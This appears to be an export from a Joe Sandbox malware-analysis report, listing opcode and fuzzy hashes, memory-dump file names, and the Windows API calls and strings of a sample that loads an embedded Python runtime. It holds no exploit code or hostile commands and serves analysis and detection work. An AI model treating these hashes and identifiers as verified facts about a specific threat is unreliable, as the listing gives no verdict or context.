                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                              • Instruction ID: 6d47eba98126159dd247e6d7a1b8a5d06b750ec52ceeca0887f59b8091e264d3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 403f67b08c5d8b9127b9d27d37b93e2a1e0a746a19683c5483168a42cc689f1f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9061F962F0C25286FF648A7D9C5A67D6680EF60770F154239EA1DC3AC5DEBEE801C702
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction ID: 4596cb38f031299149c596fc621237d67e01ed7832022c0e3c4e50bed2b403d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89515C76A1865186EF258B29C84936837A0EB45B78F344231DE8D97794CF3EE863C741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction ID: 1270566e25e6fb9a1bb0bc05910d820be7cd9c0cca65480d1beebaab8cf5578d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C516437A18A5586EB248B29C84A33837A1EB44B78F344131DE8D97794DF3EE863C741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction ID: 4fa54c7cf8162e31db862b354778c96af3ab7a1f8942fdb138f0b1e27bbbb828
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41518476A1865186EF688B29C84923833A1FB59F78F248135CE4D87795CF3AE863C741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction ID: f19fc4eb43d1a7c6dfd07b5a8e8ab037d6e53c1e9e06c0734bcd8909ca2694ad
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A518136A1865186EB248B29CC4937837A1FB45B68F344132CE4D97795CF3EE963C781
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction ID: 0ce87441aa9b2014a0f0f695a000801920b82817bd3c2301322ae55905f6f488
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2351A336A1865586EB288B29C84933C37A1EB45F68F344131CE4D977A9CF3EE863C741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction ID: 0c4aceff7cae9c0013862171d740a763f3f8041f6f25bc5476a8838f7d9b78bc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB518E36A18A5186EF248B29CC4933827B1EB49B68F345131DE4C977A4DF3EE862C741
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction ID: 8ea92525a263b1db0908177b6252147d1c6a62b15f60fb5f873dcf555c2ab54b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F41A462C0D74F05EDA9891C0D0D6B46B809F22BB0D5852B5DDDD973D3CD0DA9A7C306
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction ID: 85065961ca6842084c6a6e89fa5094fa95e95bfc959d812abd0e139f74d10c82
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B41F372714A9582EF04CF2ADD29569B3A1FB48FE0B499036EE0DD7B58DE3DD0528301
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                              • Instruction ID: b74417f5ffbc910213f8f9b181f86c3f983cd52cc70160d8495f6f535e5ba554
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E331D232B1CB4241EB649F256C4612E6AD5AF85BF0F144238EE8D93BD6DF3CD4228705
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                              • Instruction ID: e54fc405fd0f07fcca0deaf936fce5a97b3c38da835a626a34466b2d1661bca8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF04F71B182968ADFA88F69A80766977D0F748394F80C039E68DC7A04DE3C90628F09
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                              • Instruction ID: 5681c4e14ccc662efa7a78ca8a7469310bc7ca3d48011da64a06dba1b93a3a78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40A00261D0CD0AD4EE448F08EC950352330FB68321B800031E90DD10B09FBDB448E306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5840
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5852
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5889
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F589B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58B4
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58C6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58DF
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58F1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F590D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F591F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F593B
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F594D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5969
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F597B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5997
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59C5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction ID: 6619931e63b14310192cb118969e6357bb73a3435b4290c8dd8125c1c6dcdb6d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3022DA6490DF0B99FE15CB5DBC6A5B823B0AF247B5F541035C81E82260FFBDB189924B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62C0F86B7,?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction ID: c4a4301164b462cb6397726c5f45bbea8ec773880fba7c5bfdc6f11441fe4b33
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B951F610A2DA4288FF51EB28EC562FE2361AF957A0F544431DE0EC26D5EFBDF045834A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
